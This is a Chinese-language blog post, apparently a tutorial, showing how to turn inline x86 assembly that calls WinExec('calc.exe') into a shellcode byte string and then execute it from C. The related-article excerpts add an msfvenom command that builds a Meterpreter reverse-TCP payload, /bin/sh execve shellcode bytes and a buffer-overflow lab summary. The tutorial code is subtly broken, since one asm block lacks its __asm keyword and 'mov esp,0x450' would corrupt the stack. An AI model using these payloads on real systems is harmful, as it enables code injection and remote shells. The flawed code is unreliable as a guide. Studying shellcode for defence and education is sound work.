c和汇编混合编程----shellcode----弹出计算器

最新推荐文章于 2023-03-06 16:56:00 发布
最新推荐文章于 2023-03-06 16:56:00 发布
阅读量964 收藏 4
点赞数 1
分类专栏: shellcode
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41683305/article/details/104233418
版权

先用c和汇编混合编程成功弹出计算器(在VC++里运行)

#include "stdio.h"
#include "windows.h"

int main(int argc, char* argv[])
{
	printf("begin\n");
    HINSTANCE libHandle;
	char *dll="kernel32.dll";
    libHandle=LoadLibrary(dll);


  {
	  sub esp,0x454
	  xor ebx,ebx
	  push ebx
	  mov eax,0x6578652e
	  push eax
	  mov eax,0x636c6163
	  push eax
	  mov eax,esp
	  push 5
	  push eax
	  call dword ptr [WinExec]
	  mov esp,0x450
	  
   }
	return 0;

}

设置断点,反汇编
在这里插入图片描述
将程序的反汇编复制到一个文本编辑器里,将上面汇编的机器码找出来
在这里插入图片描述
在机器码前面加上\x,放到一个字符数据里

char shellcode[]="\x81\xEC\x54\x04\x00\x00\x33\xDB\x53\xB8\x2E\x65\x78\x65\x50\xB8\x63\x61\x6C\x63\x50\x8B\xC4\x6A\x05\x50\xFF\x15\x14\xA2\x42\x00\xBC\x50\x04\x00\x00";

只要取汇编的机器码就行,c的不用管

将上面的程序改成

#include "stdio.h"
#include "windows.h"

char shellcode[]="\x81\xEC\x54\x04\x00\x00\x33\xDB\x53\xB8\x2E\x65\x78\x65\x50\xB8\x63\x61\x6C\x63\x50\x8B\xC4\x6A\x05\x50\xFF\x15\x14\xA2\x42\x00\xBC\x50\x04\x00\x00";
int main(int argc, char* argv[])
{
	printf("begin\n");
    HINSTANCE libHandle;
	char *dll="kernel32.dll";
    libHandle=LoadLibrary(dll);

	__asm
	{
	  lea eax,shellcode
	  call eax

	}
	return 0;

}

在运行,也能弹出计算器
在这里插入图片描述

p0inter
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
汇编语言编写shellcode实现弹窗计算器
yeanhoo的博客
04-04 1821
使用汇编语言编写shellcode,调用WinExec实现弹出计算器汇编代码如下: .386 .model flat,stdcall ; 代码区域 .code main: push ebp mov ebp,esp sub esp,20h; 开辟栈空间 ; 获取Kernel32基址 assume fs:nothing mov eax,[fs:30h]; peb结构所在地址 mov ...
C语言 弹出1000个计算器或cmd窗口程序
02-27
打开之后,会弹出对话框,然后选择弹出窗口,小心上当!
shellcode样本—弹出计算器
谈成(C/C++)
04-28 1734
该样本弹出计算器的原理为: 1)先加载MSVCRT.DLL。 2)再使用system()函数调用calc命令。 该shellcode脚本只在xp下通过实验,仅适合用来研究和验证漏洞。其的函数地址采用的都是固定地址。win7以上不适用。 该样本特点:没有任何0x00,可以参与字符串类溢出。比如strcpy等。 unsigned char shellcode2[] = "\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53"
shellcode2--弹出计算器
gclome的博客
02-18 2144
// 345.cpp : Defines the entry point for the console application. // #include "stdafx.h" #include "stdio.h" #include "windows.h" char shellcode[]="\x66\x81\xEC\x54\x04\x33\xDB\x53\x68\x2E\x65\x78\x65\...
shellcode——1、采用硬编码弹出计算器
alwin_cx的博客
05-19 6362
一、shellcode介绍    用一句话给shellcode下个定义,那就是“一段可以执行特定功能的机器码”。二、实验环境及工具介绍实验环境:Windows XP SP3实验工具:OllyDbg、WinHex、LordPE三、编程思路     用C语言来描述其实就是两句:WinExec("calc.exe", 5); ExitProcess(0);     看到有些文章会在开头还加一句:Load...
shellcode
snowleopard_bin的博客
08-10 1503
短shuallcode shellcode='\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\xb0\x3b\x0f\x05' 64bit local /bin/sh 有时遇到写的字符不能包含'\x0b'这个字符,因此不能...
rust-windows-shellcode:Rust的Windows Shellcode开发
03-05
用Rust编写Windows Shellcode 项目概况 Windows shellcode项目位于shellcode/ ,它可以构建为仅包含.text节的PE文件,并且没有外部依赖项。 然后,我们可以转储.text节并进行一些修补以使其与位置无关。 这个想法...
go-shellcode:将Shellcode加载到新进程
02-06
使用msfvenom或metasploit以十六进制格式生成一些shellcode: $ msfvenom -p windows/meterpreter/reverse_tcp -f hex -o rev.hex LHOST=127.0.0.1 LPORT=4444c:\windows\temp>sc.exe fce8820000006089e531c0648b...
Shellcode-Extractor:Python脚本从Linux可执行文件提取Shellcode
05-18
ShellcodeExtractor SHELLCODE-EXTRACTOR工具,用于从对象/二进制文件提取shellcode和长度。 版权所有(C)2017 Neetx 该文件是Shellcode-Extractor的一部分。 Shellcode-Extractor是免费软件:您可以根据自由软件...
cpp-使用纯CC编写的ShellCode生成框架
08-16
使用纯C/C 编写的ShellCode生成框架
简易计算器程序(汇编调C程序)
08-19
基于51的简易计算器程序(汇编调C程序)
弹出DOS窗口的缓冲区溢出shellcode源代码及可执行文件
05-06
弹出DOS窗口的缓冲区溢出shellcode源代码及可执行文件,有两个不同的程序代码
cpp-在恶意软件分析过程快速调试shellcode
08-15
在恶意软件分析过程快速调试shellcode
Shellcode提取、加载与解析
莫慌的博客
03-06 1899
msf的shellcode 如何实现的
栈溢出攻击之弹出计算器
Bonjour~
04-15 7650
一.系统栈溢出原理函数栈帧及寄存器在高级语言,当函数被调用时,系统栈会为这个函数开辟一个新的栈帧,并把它压入栈。这个栈帧的内存空间被它所属的函数独占,正常情况下是不会和别的函数共享的。当函数返回时,系统栈会弹出该函数所对应的栈帧。Win32系统提供两个特殊的寄存器用于标识位于系统栈顶端的栈帧: 1. ESP:栈指针寄存器,其内存放着一个指针,该指针永远指向系统栈最上面一个栈帧的栈顶; 2.
Shell——计算器解决思路
martingpf的博客
09-03 258
通过脚本参数变量判断用户输入是否为整数,并进行计算 #!/bin/bash #no.1 [ $# -ne 2 ]&&{         echo $"USAGE $0 NUM1 NUM2"         exit 1 } #no.2 a=$1 b=$2 expr $a + $b + 110 &>/dev/null if [ $? -ne 0 ];then ...
两种ShellCode
Bill
02-16 378
两种ShellCode 1. 第一种 \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80 对应的汇编代码: section .text global _start _start: push eax push 0x6873...
VC++如何通过代码自动弹出Windows系统的一些窗口(附源码)
dvlinker的技术专栏
04-10 6074
有时软件检测到一些问题时,需要打开相关的Windows系统的一些窗口,以供用户查看或者去做设置。本文简单地讲述一下如何弹出一些与软件相关的Windows系统窗口。
执行shellcode的几种方式
qq_41683305的博客
02-24 4805
首先写出汇编成功弹出计算器 #pragma comment(linker,"/section:.data,RWE") //data段可读写 #pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"") //不显示窗口 #pragma comment(linker,"/INCREMENTAL:NO") //指...
Buffer-Overflow Attack Lab
最新发布
12-27
Buffer-Overflow Attack Lab是一个用于学习和实践缓冲区溢出攻击的实验。通过这个实验,你可以更好地理解缓冲区溢出攻击的原理和实现方式,并学习如何保护系统免受此类攻击。 在Buffer-Overflow Attack Lab,你将面对一个具有缓冲区溢出漏洞的程序。你的目标是利用这个漏洞,以执行恶意代码或者获取系统权限。通过完成这个实验,你将学习到以下内容: 1. 理解缓冲区溢出攻击的原理:了解缓冲区溢出攻击是如何利用程序的漏洞来执行恶意代码的。 2. 漏洞利用技术:学习如何利用缓冲区溢出漏洞来修改程序的执行流程,以执行恶意代码或者获取系统权限。 3. Shellcode编写:了解如何编写Shellcode,这是一段用于执行特定操作的机器码。 4. 栈布局和内存管理:了解程序在内存的布局,包括栈帧、函数调用和返回等。 5. 缓冲区溢出的防御措施:学习如何通过使用安全编程技术和安全开发实践来防止缓冲区溢出攻击。 为了完成Buffer-Overflow Attack Lab,你需要按照实验指导书的步骤进行操作,并使用提供的工具和代码来进行实验。在实验过程,你将学习到如何构造恶意输入,以触发缓冲区溢出漏洞,并利用这个漏洞来执行恶意代码。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值